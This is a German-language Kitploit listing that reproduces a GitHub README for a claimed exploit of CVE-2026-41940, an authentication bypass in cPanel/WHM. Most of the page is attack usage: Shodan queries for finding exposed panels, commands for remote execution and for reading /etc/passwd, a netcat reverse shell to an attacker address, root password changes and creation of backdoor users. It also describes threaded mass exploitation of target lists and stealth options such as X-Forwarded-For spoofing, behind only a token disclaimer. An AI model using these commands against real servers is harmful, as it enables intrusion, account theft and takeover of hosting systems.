Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM Auth-Bypass-Exploit - Bester Ablauf 💥 CRLF-Injection führt zu Auth-Bypass, Session-Hijacking & Kontoleck. ✅ Proxy, benutzerdefinierter UA, Keep-Alive, Wiederholungsversuche, SSL-Verifizierung, farbige Ausgabe, Datei-Speicherung unterstützt. ⚡ Fortgeschrittener PoC für Pentester. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
Payload-Entwicklung
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

Repository anzeigen
928vor 1 MonatNoch nicht geprüft

Über

🚀 CVE-2026-41940 cPanel/WHM Auth-Bypass-Exploit - Bester Ablauf 💥 CRLF-Injection führt zu Auth-Bypass, Session-Hijacking & Kontoleck. ✅ Proxy, benutzerdefinierter UA, Keep-Alive, Wiederholungsversuche, SSL-Verifizierung, farbige Ausgabe, Datei-Speicherung unterstützt. ⚡ Fortgeschrittener PoC für Pentester.

Teilen

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM Authentifizierungs-Bypass-Exploit

Python License CVSS Pentesting

cPanel & WHM Edition - CRLF-Injection zur Authentifizierungsumgehung & vollständiges Session-Hijacking

📌 Überblick

Dieser Exploit nutzt CVE-2026-41940 aus, eine kritische Authentifizierungs-Bypass-Schwachstelle in cPanel/WHM. Durch das Injizieren eines präparierten CRLF-Payloads in das Session-Management-System erlangt er Session-Hijacking, Root-Zugriff und vollständige Kontrolle über das Hosting-Panel – ganz ohne gültige Anmeldedaten.

🔥 Wichtigste Funktionen

🎯 Betroffene Versionen

📍 Shodan-Suche

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Haftungsausschluss: Dieses Tool ist nur für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff ist illegal.

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Anwendungsbeispiele

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Befehle der interaktiven Shell

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

🔧 Remote-Befehlsausführung

root@kitploit:~
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Reverse-Shell

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Post-Exploitation-Operationen

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Massen-Exploitation (Multi-Target)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Erweiterte Optionen

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Befehlszeilenargumente

🧪 Testumgebung

root@kitploit:~
# Docker (if you want to test safely)
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

# Or with vulnerable version
docker pull cpanel/cpanel:11.102
docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Verwandte Exploits

Schau dir meine anderen Exploit-Repositories an:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Tool herunterladen
KategorieFunktionen
Exploitation✅ Authentifizierungsumgehung per CRLF-Injection
✅ WHM-Session-Hijacking
✅ Sicherheits-Token-Leakage
✅ Sofortiger Root-Zugriff
Post-Exploitation✅ Extraktion der Kontenliste (Benutzer + Domain)
✅ Remote-Befehlsausführung (RCE)
✅ Reverse-Shell (netcat-kompatibel)
✅ Lesen von Dateien (Konfigurationen, Logs usw.)
✅ Root-Passwort ändern
✅ Neuen cPanel-Benutzer erstellen
Scanning✅ Exploitation einzelner Ziele
✅ Massen-Scan mehrerer Ziele
✅ Multi-Threading (konfigurierbare Threads)
✅ Unterstützung für Port-Override
Tarnung✅ Zufällige Verzögerungen zwischen Anfragen
✅ X-Forwarded-For-Spoofing
✅ Unterstützung für benutzerdefinierte User-Agents
✅ Proxy-Unterstützung (HTTP/HTTPS)
Benutzerfreundlichkeit✅ Interaktive WHM-Shell (-i)
✅ Farbige Ausgabe (colorama)
✅ Ausführlicher/Debug-Modus
✅ Export der Kontenliste in eine Datei
✅ Keep-Alive-Session-Thread
✅ Wiederholungsmechanismus für instabile Verbindungen
ProduktVersionenStatus
cPanel & WHM11.92 - 11.102✅ Bestätigt
cPanel & WHM11.104 - 11.110✅ Bestätigt
cPanel & WHM11.118 - 11.136⚠️ Eingeschränkt
cPanel & WHM< 11.86✅ Möglicherweise verwundbar
KurzLangBeschreibungStandard
-t--targetURL für ein einzelnes ZielErforderlich (Einzelziel)
-l--target-fileDatei mit ZiellisteErforderlich (Massen-Scan)
-p--portPort überschreibenAutomatisch
-o--outputKontenliste in Datei speichernNone
-v--verboseDebug-Ausgabe aktivierenFalse
-i--interactiveInteraktive WHM-ShellFalse
--proxyHTTP/HTTPS-ProxyNone
-ua--user-agentBenutzerdefinierter User-AgentZufällig
--cmdEinzelnen Befehl ausführenNone
--reverse-shellReverse-Shell IP:PORTNone
--passwdRoot-Passwort ändernNone
--adduserNeuen Benutzer erstellen (BENUTZER DOMAIN PASS)None
--readDatei vom Ziel lesenNone
--threadsThreads für Massen-Scan10
--delayKeep-Alive-Intervall (Sekunden)3.0
--max-retriesMaximale Wiederholungen pro Anfrage3
--no-keep-aliveSession nicht aufrechterhaltenFalse
--ssl-verifySSL-Zertifikate verifizierenFalse